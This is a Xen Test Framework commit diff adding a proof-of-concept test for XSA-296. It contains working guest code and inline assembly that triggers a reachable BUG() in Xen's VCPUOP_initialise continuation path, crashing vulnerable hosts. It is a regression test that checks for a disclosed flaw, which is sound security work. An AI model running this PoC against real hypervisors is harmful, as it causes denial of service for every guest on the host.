xenbits.xensource.com Git - xtf.git/commitdiff
XSA-296 PoC
author     Andrew Cooper <andrew.cooper3@citrix.com>
           Thu, 11 Apr 2019 15:50:23 +0000 (16:50 +0100)
committer  Andrew Cooper <andrew.cooper3@citrix.com>
           Thu, 28 Nov 2019 23:24:14 +0000 (23:24 +0000)
Signed-off-by: Andrew Cooper <andrew.cooper3@citrix.com>
docs/all-tests.dox
include/xen/arch-x86/xen-x86_64.h
tests/xsa-296/Makefile [new file with mode: 0644]
tests/xsa-296/extra.cfg.in [new file with mode: 0644]
tests/xsa-296/main.c [new file with mode: 0644]

index f0169bf41fd09f30f6583a3fa07a660f21bd0641..ce04a6ddb310518970333a065628fb9b6b7b4d79 100644 (file)
@@ -138,6 +138,8 @@ non-canonical addresses.
 
 XSA-293 - See @ref test-pv-fsgsbase.
 
+@subpage test-xsa-296 - VCPUOP_initialise DoS.
+
 
 @section index-utility Utilities
 
index 30bc74d7245f6cdd85294645b929dc246ecf2141..b3174e144d7812d5371887a5f318e112ae93690f 100644 (file)
@@ -86,6 +86,16 @@ struct xen_cpu_user_regs {
 #undef __DECL_REG_LO16
 #undef __DECL_REG_HI
 
+static inline unsigned long xen_pfn_to_cr3(unsigned long pfn)
+{
+    return pfn << 12;
+}
+
+static inline unsigned long xen_cr3_to_pfn(unsigned long cr3)
+{
+    return cr3 >> 12;
+}
+
 struct arch_vcpu_info {
     unsigned long cr2;
     unsigned long pad; /* sizeof(vcpu_info_t) == 64 */
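
For 64bit PV guests, the two helpers added above pack a pagetable's frame
number into the format expected by the ctrlreg[3] field of a
vcpu_guest_context, and unpack it again.  A minimal usage sketch, mirroring
how the new test consumes them below (illustrative only, not part of this
commit; top_pt is a made-up name, and virt_to_gfn() is the existing XTF
helper used later in this test):

    /* Stand-in for a caller-built top-level pagetable. */
    static intpte_t top_pt[L1_PT_ENTRIES] __page_aligned_bss;

    xen_vcpu_guest_context_t ctx = { .flags = VGCF_IN_KERNEL };

    /* Pack the pagetable's frame number into the CR3 field... */
    ctx.ctrlreg[3] = xen_pfn_to_cr3(virt_to_gfn(top_pt));

    /* ... and recover the frame number again if needed. */
    unsigned long gfn = xen_cr3_to_pfn(ctx.ctrlreg[3]);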
diff --git a/tests/xsa-296/Makefile b/tests/xsa-296/Makefile
new file mode 100644 (file)
index 0000000..cc9313d
--- /dev/null
@@ -0,0 +1,11 @@
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-296
+CATEGORY  := xsa
+TEST-ENVS := $(PV_ENVIRONMENTS)
+
+TEST-EXTRA-CFG := extra.cfg.in
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-296/extra.cfg.in b/tests/xsa-296/extra.cfg.in
new file mode 100644 (file)
index 0000000..8cfbab9
--- /dev/null
@@ -0,0 +1 @@
+vcpus=2
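
The PoC needs a second, never-started vCPU for vCPU0 to target with
VCPUOP_initialise, which is all this fragment provides.  The XTF build folds
a TEST-EXTRA-CFG fragment into the generated xl configuration, so the
effective guest config ends up along these lines (an illustrative sketch:
the name, kernel path and memory value are assumptions, only vcpus=2 comes
from this commit):

    # sketch of the effective PV guest config
    name   = "test-pv64-xsa-296"
    kernel = "tests/xsa-296/test-pv64-xsa-296"
    memory = 128
    vcpus  = 2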
diff --git a/tests/xsa-296/main.c b/tests/xsa-296/main.c
new file mode 100644 (file)
index 0000000..20d04f4
--- /dev/null
@@ -0,0 +1,173 @@
+/**
+ * @file tests/xsa-296/main.c
+ * @ref test-xsa-296
+ *
+ * @page test-xsa-296 XSA-296
+ *
+ * Advisory: [XSA-296](https://xenbits.xen.org/xsa/advisory-296.html)
+ *
+ * Before XSA-296, Xen used BUG() for format string checking in the hypercall
+ * continuation setup logic.  This BUG() was reachable via the
+ * VCPUOP_initialise hypercall for PV guests.
+ *
+ * To tickle a continuation, we set up the new vCPU's pagetables to require
+ * validation.  With PV-L1TF protections in place, we can force a continuation
+ * by writing the first L1TF-vulnerable PTE for the domain.
+ *
+ * For less buggy (or unprotected) hardware, we have to be a bit more cunning
+ * and (ab)use the fact that we can send ourselves an event by writing
+ * directly into the 2-level evtchn block, rather than using a hypercall.
+ *
+ * This leaves a one-instruction race window in which, if Xen takes a real
+ * interrupt, the pending evtchn is delivered before the VCPUOP_initialise
+ * hypercall is issued.
+ *
+ * For 64bit PV guests, we can actually spot this as a side effect of the
+ * SYSCALL ABI, and restart if it occurs.  For 32bit PV guests, there is no
+ * way to distinguish, so we have to live with the race.
+ *
+ * @see tests/xsa-296/main.c
+ */
+#include <xtf.h>
+
+const char test_title[] = "XSA-296 PoC";
+
+/* Helper for simplifying the 32/64bit differences. */
+#ifdef __i386__
+#define COND(_32, _64) _32
+#else
+#define COND(_32, _64) _64
+#endif
+
+/* Appears in exception frames with RPL0.  Needs RPL3 to use. */
+#define __TEST_CS64 (GDTE_AVAIL0 << 3)
+
+static intpte_t t1[L1_PT_ENTRIES] __page_aligned_bss;
+static intpte_t t2[L1_PT_ENTRIES] __page_aligned_bss;
+static xen_vcpu_guest_context_t vcpu1_ctx = {
+    .flags = VGCF_IN_KERNEL,
+};
+
+void do_evtchn(struct cpu_regs *regs)
+{
+    if ( IS_DEFINED(CONFIG_64BIT) && regs->cs == __TEST_CS64 )
+    {
+        static unsigned int count;
+        extern unsigned long restart[] asm ("restart");
+
+        if ( count++ > 5 )
+            panic("Evtchn livelock\n");
+
+        regs->ip = _u(restart);
+    }
+
+    shared_info.vcpu_info[0].evtchn_upcall_pending = 0;
+    shared_info.vcpu_info[0].evtchn_upcall_mask = 1;
+}
+
+void test_main(void)
+{
+    unsigned long tmp;
+    int rc;
+
+    /* Set up a secondary %cs so we can spot SYSCALL being executed. */
+    if ( IS_DEFINED(CONFIG_64BIT) )
+        update_desc(&gdt[__TEST_CS64 >> 3],
+                    GDTE_SYM(0, 0xfffff, COMMON, CODE, DPL3, R, L));
+
+    /*
+     * Prepare pagetables:
+     *  - vcpu1_ctx.cr3 points at t2, which references t1
+     *  - t2 is an L4 (64bit) or an L3 (32bit)
+     *  - t1 is an L3 (64bit) or an L2xen (32bit)
+     *
+     *  * L4 validation is performed with preemption, but without actually
+     *    checking, so validation needs to descend a level before the
+     *    hypercall will hit a continuation point.
+     *
+     *  * t1[511] is deliberately chosen as an L1TF-vulnerable PTE, so that if
+     *    PV-L1TF protections are enabled, the hypercall will hit a
+     *    continuation point irrespective of pending event channels.
+     */
+    t1[511] = pte_from_virt(t1, 0);
+    t2[3] = pte_from_virt(t1, PF_SYM(P));
+    vcpu1_ctx.ctrlreg[3] = xen_pfn_to_cr3(virt_to_gfn(t2));
+
+    if ( hypercall_update_va_mapping(
+             _u(t1), pte_from_virt(t1, PF_SYM(AD, P)), UVMF_INVLPG) )
+        return xtf_error("Error trying to remap t1 as read-only\n");
+    if ( hypercall_update_va_mapping(
+             _u(t2), pte_from_virt(t2, PF_SYM(AD, P)), UVMF_INVLPG) )
+        return xtf_error("Error trying to remap t2 as read-only\n");
+
+    /*
+     * Opencoded version of:
+     *
+     *   shared_info.vcpu_info[0].evtchn_upcall_pending = 1;
+     *   shared_info.vcpu_info[0].evtchn_upcall_mask = 0;
+     *   rc = hypercall_vcpu_op(VCPUOP_initialise, 1, &vcpu1_ctx);
+     *
+     * but written with only a single instruction race window between enabling
+     * events and issuing the hypercall.
+     */
+    asm volatile (
+#ifdef __x86_64__
+        /* Set up %cs so we can spot when SYSCALL gets executed. */
+        "restart:"
+        "push $%c[cs];"
+        "push $1f;"
+        "lretq; 1:"
+#endif
+        /*
+         * shared_info.vcpu_info[0].evtchn_upcall_pending = 1;
+         * shared_info.vcpu_info[0].evtchn_upcall_mask = 0;
+         */
+        "movb $1, %[pend];"
+        "movb $0, %[mask];"
+
+        /* rc = hypercall_vcpu_op(VCPUOP_initialise, 1, &vcpu1_ctx); */
+        COND("int $0x82;", "syscall;")
+
+        : [pend] "=m" (shared_info.vcpu_info[0].evtchn_upcall_pending),
+          [mask] "=m" (shared_info.vcpu_info[0].evtchn_upcall_mask),
+          "=a"             (rc),
+          COND("=b", "=D") (tmp),
+          COND("=c", "=S") (tmp),
+          "=d"             (tmp)
+        : "a"              (__HYPERVISOR_vcpu_op),
+          COND("b", "D")   (VCPUOP_initialise),
+          COND("c", "S")   (1),
+          "d"              (&vcpu1_ctx)
+#ifdef __x86_64__
+          , [cs] "i" (__TEST_CS64 | 3)
+#endif
+
+        : "memory"
+#ifdef __x86_64__
+          , "rcx", "r11"
+#endif
+        );
+
+    switch ( rc )
+    {
+    case 0:
+        return xtf_success("Success: " COND("Probably not", "Not")
+                           " vulnerable to XSA-296\n");
+
+    case -ENOENT:
+        return xtf_error("Error: Insufficient vcpus\n");
+
+    default:
+        return xtf_error("Error: unexpected result %d\n", rc);
+    }
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */
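
For reference, a PoC like this is normally built and run from dom0 with the
XTF runner; the exact invocation below is an assumption based on common XTF
usage rather than anything stated in this commit:

    make -j4                # build all test environments, including tests/xsa-296
    ./xtf-runner xsa-296    # run the test in each built PV environment

On a fixed hypervisor the test reports success; on a vulnerable one the
reachable BUG() is expected to bring the host down, which is the denial of
service the advisory describes.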